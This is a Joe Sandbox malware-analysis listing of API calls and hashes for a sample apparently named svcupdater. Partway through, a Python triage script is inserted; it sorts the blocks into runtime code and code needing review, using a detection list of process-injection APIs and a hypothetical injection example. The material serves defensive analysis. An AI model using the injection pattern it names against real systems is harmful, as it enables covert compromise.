                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$std::locale::_$Concurrency::cancel_current_taskFacet_H_prolog3InitRegisterSetgloballocaleYarn
                                                                                                    • String ID:
                                                                                                    • API String ID: 298508500-0
                                                                                                    • Opcode ID: b065ee8ed111af11476383252827ecc26b56bc9a29b69787d27689ecfc1e5fe3
                                                                                                    • Instruction ID: c52de53baadfe9aa0137ef8bd7eba385ea64b26cfdbd49612d5686d450513c8d
                                                                                                    • Opcode Fuzzy Hash: b065ee8ed111af11476383252827ecc26b56bc9a29b69787d27689ecfc1e5fe3
                                                                                                    • Instruction Fuzzy Hash: 38417DB5D00258DFCF11DF98D981BAEBBF4EB08720F1441A9E819A7342DB75AD05CBA1
                                                                                                    APIs
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00BF6697
                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00BF669F
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00BF6728
                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00BF6753
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00BF67A8
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                    • Opcode ID: 81a9eb9f88fbf919c1af01099fe0b52726e35cf1c0ac0782add859f1ae45f64c
                                                                                                    • Instruction ID: dd64815e689cf2e1447d44e2220302328e09d9f14c2776e0f2ef3bce8d722ee9
                                                                                                    • Opcode Fuzzy Hash: 81a9eb9f88fbf919c1af01099fe0b52726e35cf1c0ac0782add859f1ae45f64c
                                                                                                    • Instruction Fuzzy Hash: 7F415134A0021CABCF10EF68C885AAEBBE5EF45318F148195ED149B392D775AD59CB90
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00C04F91,00BE2EE7,?,?,00000000,?,?,00C051BB,00000021,FlsSetValue,00C19450,00C19458,?), ref: 00C04F45
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                    • API String ID: 3664257935-537541572
                                                                                                    • Opcode ID: 7c7abd364041cfcc3277b5225a4144685041c868f2630439d797ce27a2031b48
                                                                                                    • Instruction ID: f32497a47ad92bded03996b06465fb9a1e83b45c1a87b6d967cccb3bf9230f54
                                                                                                    • Opcode Fuzzy Hash: 7c7abd364041cfcc3277b5225a4144685041c868f2630439d797ce27a2031b48
                                                                                                    • Instruction Fuzzy Hash: B7212BB1A41112FBC72597A0DC41B9F7768AF427A0F254150FF25A72D0DB30EE01C6E0
                                                                                                    APIs
                                                                                                    Similarity
                                                                                                    • API ID: __freea$Info
                                                                                                    • String ID:
                                                                                                    • API String ID: 541289543-0
                                                                                                    • Opcode ID: 0550d7dfb429cb2e88c24f926629f17c51335fcbdc46ca10900c130fddc11288
                                                                                                    • Instruction ID: 2b9f51ef89d1d54253611f8203cbd1e4045851f09e5b36ed83bf202e6572fc2f
                                                                                                    • Opcode Fuzzy Hash: 0550d7dfb429cb2e88c24f926629f17c51335fcbdc46ca10900c130fddc11288
                                                                                                    • Instruction Fuzzy Hash: 6571E57AA002099BDF209FA48C91BFF77BA9F4A310F150055F924B72C1D6359EA5E760
                                                                                                    APIs
                                                                                                    • GetCPInfo.KERNEL32(?,?), ref: 00BF4F92
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00BF5020
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BF5092
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00BF50AC
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BF510F
                                                                                                    • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00BF512C
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$CompareInfoString
                                                                                                    • String ID:
                                                                                                    • API String ID: 2984826149-0
                                                                                                    • Opcode ID: 31bb81e2b28873ee2dc85013aa702f7077dbc052b9230df5489da15466ead677
                                                                                                    • Instruction ID: 2330ffb99f8b77c3abaf0f0d2f199cf5977bb178b6636ddbabaff6ca96535596
                                                                                                    • Opcode Fuzzy Hash: 31bb81e2b28873ee2dc85013aa702f7077dbc052b9230df5489da15466ead677
                                                                                                    • Instruction Fuzzy Hash: 41716B7190064E9ADB318FA4DC81ABF7BFAEF45310F150095EB09A7251DB359948CBA0
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00BF4D66
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00BF4DD1
                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BF4DEE
                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00BF4E2D
                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BF4E8C
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00BF4EAF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiStringWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 2829165498-0
                                                                                                    • Opcode ID: 8bad6a0d52cb180a6988f7cea9b61253f6655a59dd1543c364fb7605875cf6b8
                                                                                                    • Instruction ID: ac46d8bab403fc45f8a7cf52158e7d3a2bcfa478453e7fe2b03dd2407d6a83fa
                                                                                                    • Opcode Fuzzy Hash: 8bad6a0d52cb180a6988f7cea9b61253f6655a59dd1543c364fb7605875cf6b8
                                                                                                    • Instruction Fuzzy Hash: B0519A72A0021EABEB248FA4CC80FBB7BE9FF44750F1145A8FB159B160D7718D58CA90
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BE8796
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BE87B9
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE87D9
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00BE884B
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE8863
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00BE8886
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                    • String ID:
                                                                                                    • API String ID: 2081738530-0
                                                                                                    • Opcode ID: 95ebed323a42a7813988481b5d94d4f4f1480b3325674d1d13e348226f411cb3
                                                                                                    • Instruction ID: ed918290ea311b97317428f4e98e0961e21ac2d2873cf3918a3c3b73fddce4b6
                                                                                                    • Opcode Fuzzy Hash: 95ebed323a42a7813988481b5d94d4f4f1480b3325674d1d13e348226f411cb3
                                                                                                    • Instruction Fuzzy Hash: A451A071A00649DFCB24DF59D841BAEBBF4FF48720F1442A9E819A7791DB30AE05CB91
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BED1FB
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BED220
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BED240
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BED271
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00BED2E6
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00BED300
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                    • String ID:
                                                                                                    • API String ID: 2081738530-0
                                                                                                    • Opcode ID: d9ce587f08daab9e841f91a8ee8e263c2c48c43a6652303291de57a6a11c50e2
                                                                                                    • Instruction ID: 4267f383e5b018c220cfd2a961504be705ff3ab19ab4a0378327e9c1842f3f32
                                                                                                    • Opcode Fuzzy Hash: d9ce587f08daab9e841f91a8ee8e263c2c48c43a6652303291de57a6a11c50e2
                                                                                                    • Instruction Fuzzy Hash: 73418B75D00258CFCF25DF98D980BAEBBF0FB48720F1441A9E915A7251DB70AD05CBA1
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BE8E06
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BE8E29
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE8E49
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00BE8EBB
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE8ED3
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00BE8EF6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                    • String ID:
                                                                                                    • API String ID: 2081738530-0
                                                                                                    • Opcode ID: f23f350fc96604968df1e5d9a1bd3e60eafc3e603e38279dce176366cdc640c4
                                                                                                    • Instruction ID: 693c88e5d978a7690bd4275cd4add6ae7973466108737efe7c31fa5028cf281a
                                                                                                    • Opcode Fuzzy Hash: f23f350fc96604968df1e5d9a1bd3e60eafc3e603e38279dce176366cdc640c4
                                                                                                    • Instruction Fuzzy Hash: D4417A71910699CFCF21DF94D941BAFB7F4FB04720F1406A9E90967691DB30AE09CBA0
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,00BF8793,00BF65FF,00BF5D1C), ref: 00BF87AA
                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BF87B8
                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BF87D1
                                                                                                    • SetLastError.KERNEL32(00000000,00BF8793,00BF65FF,00BF5D1C), ref: 00BF8823
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                    • String ID:
                                                                                                    • API String ID: 3852720340-0
                                                                                                    • Opcode ID: ba1ba96533a569d7b4ebaaa8bfc1548dbeaf837970cc17fb0b3743e4fd896bbf
                                                                                                    • Instruction ID: e5262b4eae8c025bbcb199d4a0ddd6a1ccbc638385d1fc3ad39acd20a2754b0d
                                                                                                    • Opcode Fuzzy Hash: ba1ba96533a569d7b4ebaaa8bfc1548dbeaf837970cc17fb0b3743e4fd896bbf
                                                                                                    • Instruction Fuzzy Hash: B501D43221DA199EA72526B4BC86B7F6AC8EB417B437043AFF710874E1EF614C0B56C0
                                                                                                    APIs
                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,2F4C7F60,?,?,00000000,00C136F0,000000FF,?,00BFFF03,?,?,00BFFED7,00000016), ref: 00BFFFA8
                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BFFFBA
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00C136F0,000000FF,?,00BFFF03,?,?,00BFFED7,00000016), ref: 00BFFFDC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: 4ad5c3e42a01c3f7d46a730b64be756cf2b86cb3bb0fe19075054bc6be777594
                                                                                                    • Instruction ID: 0ad711e5bbc9db24b42d8d22e6124be1bdcc8031ca315deb9ebb9e8e4ba9a901
                                                                                                    • Opcode Fuzzy Hash: 4ad5c3e42a01c3f7d46a730b64be756cf2b86cb3bb0fe19075054bc6be777594
                                                                                                    • Instruction Fuzzy Hash: 0C018F71954A59FBCB128B50DC05BFEBBB8FB46B14F004565F911A2690DBB49904CA90
                                                                                                    APIs
                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00BE3ABF
                                                                                                      • Part of subcall function 00BF691B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,00BF418F,?,00C23B78,00BE2904,string too long,00BE2904,?,?,?), ref: 00BF697B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionRaise___std_exception_copy
                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                    • API String ID: 3109751735-1866435925
                                                                                                    • Opcode ID: a37828b35e3ec12ac6119cac8fb4aceb9739b39023d025439a7458affc26af5e
                                                                                                    • Instruction ID: 31e3d13711605115a1ff4c0daf507d19a7aa0749873f31a41f4cbdb922252919
                                                                                                    • Opcode Fuzzy Hash: a37828b35e3ec12ac6119cac8fb4aceb9739b39023d025439a7458affc26af5e
                                                                                                    • Instruction Fuzzy Hash: 431127B29003086BC710DF59D805BDAB3DCEF45710F1485BAF99487642F7B0AA84CB91
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00BF9893,00000000,?,00C267D4,?,?,?,00BF9A36,00000004,InitializeCriticalSectionEx,00C17190,InitializeCriticalSectionEx), ref: 00BF98EF
                                                                                                    • GetLastError.KERNEL32(?,00BF9893,00000000,?,00C267D4,?,?,?,00BF9A36,00000004,InitializeCriticalSectionEx,00C17190,InitializeCriticalSectionEx,00000000,?,00BF97ED), ref: 00BF98F9
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00BF9921
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID: api-ms-
                                                                                                    • API String ID: 3177248105-2084034818
                                                                                                    • Opcode ID: 2344fd96baf64f00589b2dc134e94edc2049a14e5dfe1e83fd3bed6915780c1b
                                                                                                    • Instruction ID: d590c00b14ebb960411aac77afdf7b9606f8b60109351ed5f4c5c8c84d442479
                                                                                                    • Opcode Fuzzy Hash: 2344fd96baf64f00589b2dc134e94edc2049a14e5dfe1e83fd3bed6915780c1b
                                                                                                    • Instruction Fuzzy Hash: CDE04830680209F7DF111B71DD46BAC3B94EB42B50F25C0A0FE0CA44E0D7A1995495C4
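The two blocks above are compiler-emitted runtime code rather than the sample's own logic: the GetModuleHandleExW(mscoree.dll) / GetProcAddress(CorExitProcess) / FreeLibrary sequence is the MSVC CRT's exit path, and the LoadLibraryExW fallback carrying the api-ms- literal is the CRT's API-set shim. In a listing this long it pays to filter such blocks mechanically before reading the rest. The Python below is an added example, not Joe Sandbox code: it parses the APIs bullets and the String ID line of this report format and labels each function block as runtime boilerplate or as worth review. The excerpt it parses is constructed: the first two blocks are condensed from the ones above (argument lists shortened), while the third, with VirtualAllocEx / WriteProcessMemory / CreateRemoteThread at the placeholder addresses 00401000 to 00401040, is hypothetical and stands in for a process-injection routine so that the other branch of the classifier is exercised.

```python
"""Triage helper for the 'APIs' function blocks of a Joe Sandbox report.
Added example, not Joe Sandbox code: labels each block 'runtime' (CRT/STL
code the compiler emitted) or 'review' (the analyst should look at it)."""
import re
from dataclasses import dataclass, field

# One API bullet, in the three shapes the report uses:
#   • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BFFFBA
#   • std::_Lockit::_Lockit.LIBCPMT ref: 00BE8796
#   • Part of subcall function 00BF691B: RaiseException.KERNEL32(...), ref: 00BF697B
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>.+?)\.(?P<module>[A-Z0-9_]+)(?:\(.*\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)

RUNTIME_MODULES = {"LIBCPMT", "LIBVCRUNTIME", "LIBCMT", "LIBUCRT"}
RUNTIME_PREFIXES = ("std::", "___", "Concurrency::")
LAST_ERROR_APIS = {"GetLastError", "SetLastError"}

# CRT helpers that call KERNEL32 directly; recognised by the literals they
# carry (the report's '$'-separated 'String ID' field), not by their API set.
CRT_SIGNATURES = (
    ({"CorExitProcess", "mscoree.dll"},
     "CRT exit path: resolves CorExitProcess only if mscoree.dll is already loaded"),
    ({"api-ms-"}, "CRT API-set shim: LoadLibraryExW fallback for api-ms-* names"),
)

# Primitives that must never be written off as runtime noise.
INJECTION_APIS = {"VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread",
                  "NtCreateThreadEx", "SetThreadContext", "QueueUserAPC",
                  "NtMapViewOfSection", "NtUnmapViewOfSection"}


@dataclass
class FunctionBlock:
    api_id: str = ""
    apis: list = field(default_factory=list)    # (name, module, ref)
    strings: set = field(default_factory=set)


def parse_blocks(text: str) -> list:
    """Split report text into FunctionBlocks; each 'APIs' header starts a new one."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
        elif cur is None:
            continue
        elif line.startswith("• API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
        elif line.startswith("• String ID:"):
            cur.strings = {s for s in line.split(":", 1)[1].strip().split("$") if s}
        else:
            m = API_LINE.match(line)
            if m:
                cur.apis.append((m["name"], m["module"], m["ref"]))
    return blocks


def is_runtime_api(name: str, module: str) -> bool:
    return module in RUNTIME_MODULES or name.startswith(RUNTIME_PREFIXES)


def classify(block: FunctionBlock) -> tuple:
    """Return ('runtime' | 'review', reason)."""
    for literals, reason in CRT_SIGNATURES:
        if literals <= block.strings:
            return "runtime", reason
    hits = sorted({name for name, _, _ in block.apis} & INJECTION_APIS)
    if hits:
        return "review", "process-injection primitives: " + ", ".join(hits)
    flags = [is_runtime_api(n, m) for n, m, _ in block.apis]
    # Pure STL/CRT internals, optionally wrapped in GetLastError/SetLastError
    # bookkeeping (the ___vcrt_Fls* per-thread-data helper has that shape).
    if any(flags) and all(f or n in LAST_ERROR_APIS for f, (n, _, _) in zip(flags, block.apis)):
        return "runtime", "STL/CRT internals only"
    return "review", "Win32 usage not matched by any runtime signature"


def triage(text: str) -> list:
    """[(api_id, verdict, reason), ...] in report order."""
    return [(b.api_id, *classify(b)) for b in parse_blocks(text)]


# Constructed excerpt: blocks 1 and 2 condensed from the report, block 3
# hypothetical (placeholder addresses) to exercise the 'review' branch.
SAMPLE = """\
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000), ref: 00BFFFA8
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BFFFBA
• FreeLibrary.KERNEL32(00000000), ref: 00BFFFDC
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800), ref: 00BF98EF
• GetLastError.KERNEL32(?,00BF9893), ref: 00BF98F9
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: api-ms-
APIs
• VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 00401000
• WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00401020
• CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000000,00000000), ref: 00401040
Similarity
• API ID: AllocMemoryProcessRemoteThreadVirtualWrite
• String ID:
"""

if __name__ == "__main__":
    for api_id, verdict, reason in triage(SAMPLE):
        print(f"{verdict:8} {api_id:45} {reason}")
```

The signature list is deliberately short, so Win32-only blocks that it does not recognise (for instance the MultiByteToWideChar / LCMapStringEx conversion helper earlier in this listing) come back as "review" with the reason "not matched", which is the safe failure mode; extend CRT_SIGNATURES and RUNTIME_PREFIXES only with patterns you have confirmed against the compiler's own runtime sources.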
                                                                                                    APIs
                                                                                                    • GetConsoleOutputCP.KERNEL32(2F4C7F60,00000000,00000000,00000000), ref: 00C02C7B
                                                                                                      • Part of subcall function 00C09AE1: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C08296,?,00000000,-00000008), ref: 00C09B8D
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C02ED6
                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00C02F1E
                                                                                                    • GetLastError.KERNEL32 ref: 00C02FC1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 2112829910-0
                                                                                                    • Opcode ID: f64059974a6e227ba1fb4546b18fae3e6f6f9093a41f68f989f693b43129b2b7
                                                                                                    • Instruction ID: 580493ce7370ba65552b5d9e5713b3e3e04e6b7e169dd49989ca9340395f1c22
                                                                                                    • Opcode Fuzzy Hash: f64059974a6e227ba1fb4546b18fae3e6f6f9093a41f68f989f693b43129b2b7
                                                                                                    • Instruction Fuzzy Hash: 97D16BB5D002599FCF15CFE8D884AADBBB5FF48344F24452AE865E7391D730A942CB60
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AdjustPointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 1740715915-0
                                                                                                    • Opcode ID: 17e687cef4eaa048e5b15d4f401982b18794f13edfac66cdec50d88c84a0d135
                                                                                                    • Instruction ID: b583b92487d4b4acc1262193e61a00740ec8628c1ecb47680445dcd794d05aa5
                                                                                                    • Opcode Fuzzy Hash: 17e687cef4eaa048e5b15d4f401982b18794f13edfac66cdec50d88c84a0d135
                                                                                                    • Instruction Fuzzy Hash: 0A51007260060EAFDB299F11D841B7A77E0EF10310F1090AEEF45972A1EBB1ED48CB91
                                                                                                    APIs
                                                                                                      • Part of subcall function 00C09AE1: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C08296,?,00000000,-00000008), ref: 00C09B8D
                                                                                                    • GetLastError.KERNEL32 ref: 00C09F61
                                                                                                    • __dosmaperr.LIBCMT ref: 00C09F68
                                                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 00C09FA2
                                                                                                    • __dosmaperr.LIBCMT ref: 00C09FA9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
